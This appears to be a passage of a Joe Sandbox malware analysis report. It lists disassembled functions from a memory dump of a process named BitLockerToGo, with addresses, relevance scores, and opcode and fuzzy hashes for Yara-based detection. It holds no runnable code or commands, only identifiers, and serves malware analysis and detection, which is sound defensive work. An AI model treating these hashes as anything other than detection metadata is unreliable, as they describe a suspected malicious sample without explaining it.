                                                                                                                                                                                                              • Opcode ID: f275240203ce5fe6ee62c376900e49e84225a1c9b7a845b6b17bd2011425d171
                                                                                                                                                                                                              • Instruction ID: 95ac7a477c975e15de8c04a5f3dc82c6c2baede9089e7f43ad5e4e5ed4275078
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f275240203ce5fe6ee62c376900e49e84225a1c9b7a845b6b17bd2011425d171
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 07210573F51A254BE70CCE74DA147ABA2A397D0310F0AC93D9D07AB285DABD58014396
                                                                                                                                                                                                              Function 00402BA0 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 303a53f8f6f0c13bc9f298785c5808cb8a276daa0cafb7ca22b80b88847c91e1
                                                                                                                                                                                                              • Instruction ID: 83ed0d2bc1bb73ae19c5ab5e513ff7e79650feb8db7c61828ca245b12b26e3b1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 303a53f8f6f0c13bc9f298785c5808cb8a276daa0cafb7ca22b80b88847c91e1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D110437B2822207F354DE36DCDC61B6352EBC631075A0436EE81E7382C6B6F905D164
                                                                                                                                                                                                              Function 004088C0 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: bc2b2449f1927ddecac5d17b1d450968763e4900f8d3fb0560b12521c0ea3983
                                                                                                                                                                                                              • Instruction ID: 8df3cd388e3f1a9df31b47192c90ed272165250c44be961b4d970597a5366f64
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc2b2449f1927ddecac5d17b1d450968763e4900f8d3fb0560b12521c0ea3983
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23117AB3B115108BD718CE29DC8426272D3EBC8328F6D82BED159DB291CD7ADD038784
                                                                                                                                                                                                              Function 004340E0 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                              • Instruction ID: f344c88af0e97e3f64ab8a739a4378391849989b40d3f39e6c2aff3554da1db3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B5112933A055E00EC7128D3C88045A6BFE30AF7635F19539AF4F49B2D2D62ADDCA8359
                                                                                                                                                                                                              Function 00428CD0 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 38e173931c0e1061e62ec36998d8928d0e1713c0226a73d407f5cb03a3096f2a
                                                                                                                                                                                                              • Instruction ID: e7fc23a18c5c51c52ccf001cff0cb347413ab4b8ba78d824cfe79ad57718ca25
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38e173931c0e1061e62ec36998d8928d0e1713c0226a73d407f5cb03a3096f2a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A019EF170271157D760AE16B5C0B2BA2A86FA0708F58443EE94467382DF7DEC09C6A9
                                                                                                                                                                                                              Function 0041E29F Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 38406c194eb92d85c4cc9da2f922ab00cbd32008c3846a2575a3c93c65f452a0
                                                                                                                                                                                                              • Instruction ID: 6560352c488c0cc1cbe0e722603f03bea2e29cffb3ea35ac0bed7bd55b1d1a39
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38406c194eb92d85c4cc9da2f922ab00cbd32008c3846a2575a3c93c65f452a0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB118F76B112159FEB00CF6DC9016AA7BE2BB89304F15846AE808E7351DA7A99128B54
                                                                                                                                                                                                              Function 0042B5BB Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 41775c8a8687da6e2ae8076a84b54c37efd07f3c8797bfb19a9592e8aebfc7e6
                                                                                                                                                                                                              • Instruction ID: c3416db144e0931cee348b225b18a5b3d4626f4555dabc8f772ac4b01c32146e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41775c8a8687da6e2ae8076a84b54c37efd07f3c8797bfb19a9592e8aebfc7e6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E8F0443581D7508AC72D8F54A45402BB7B1FF82B58F52242CDA8A2B331D33399618B8F
                                                                                                                                                                                                              Function 00413A20 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 7a984843b570b7378253929d1441754c9cdf9516a4ccd76f455c2bd59a9e2d53
                                                                                                                                                                                                              • Instruction ID: f2ac22fbfefff821cacec86192274fb98584f81c80051fb2e57a6e434b12bc75
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a984843b570b7378253929d1441754c9cdf9516a4ccd76f455c2bd59a9e2d53
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AF01D677A413128B8324CE5CC4D06EBB3B0FF85B95B1A445ED5812F370D7319E558264
                                                                                                                                                                                                              Function 0043A770 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: 031cf76daef0f97509f5645b65aa1fa840631f367d85a6b49b87e32831d22bc2
                                                                                                                                                                                                              • Instruction ID: e67291da7be32d05bc39912814b476a9cfeb596b2505d77ff279258a03f60d40
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 031cf76daef0f97509f5645b65aa1fa840631f367d85a6b49b87e32831d22bc2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0DF086795442086FD1205F459C80D37B77EEB8E778F10121AF994123A1E726ED2297EA
                                                                                                                                                                                                              Function 0042C109 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 815f779b7f74c91ae07349251a652b715847ab3060cea46ff1cca03f017bc8e9
                                                                                                                                                                                                              • Instruction ID: 5162a717178d96b4458f75c9750bd1e672f62e5e93e48ca58dd906d96f8ec6e0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 815f779b7f74c91ae07349251a652b715847ab3060cea46ff1cca03f017bc8e9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8AD0C71450C7F145DF374A2550903B7BFE05F17245F8411CA80D567287C65D8215965F
                                                                                                                                                                                                              Function 0043BE0A Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 8490e7a2a0c0c4eed188a6a73f200dd8b886305c638b2ada781b01ecca68775d
                                                                                                                                                                                                              • Instruction ID: 1012ec58965914f68f52c692a15329e62dc1e1454717e64e2e8a0fc4e8fbbda6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8490e7a2a0c0c4eed188a6a73f200dd8b886305c638b2ada781b01ecca68775d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1CC012BAE914308BCB2C8B24CC606B9A2A19A8B114B0BE3388C5D73F00E0288C0081C9
                                                                                                                                                                                                              Function 00422D01 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 186COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DrivesLogical
                                                                                                                                                                                                              • String ID: @@2@$@@4@
                                                                                                                                                                                                              • API String ID: 999431828-865830157
                                                                                                                                                                                                              • Opcode ID: 4601b0908604dcb61ea30c4dea6a2c41b4de2a0c033ba0e6186b49dbd17b5b19
                                                                                                                                                                                                              • Instruction ID: b30ad74d6b785837ac394f441cadf76c761bfb56c6a15aa40f9ea50ff11fe3de
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4601b0908604dcb61ea30c4dea6a2c41b4de2a0c033ba0e6186b49dbd17b5b19
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C151E0B4618310DFD350AF58E85162BB2B5FFC9305F48883DF6869B721E7B88905CB5A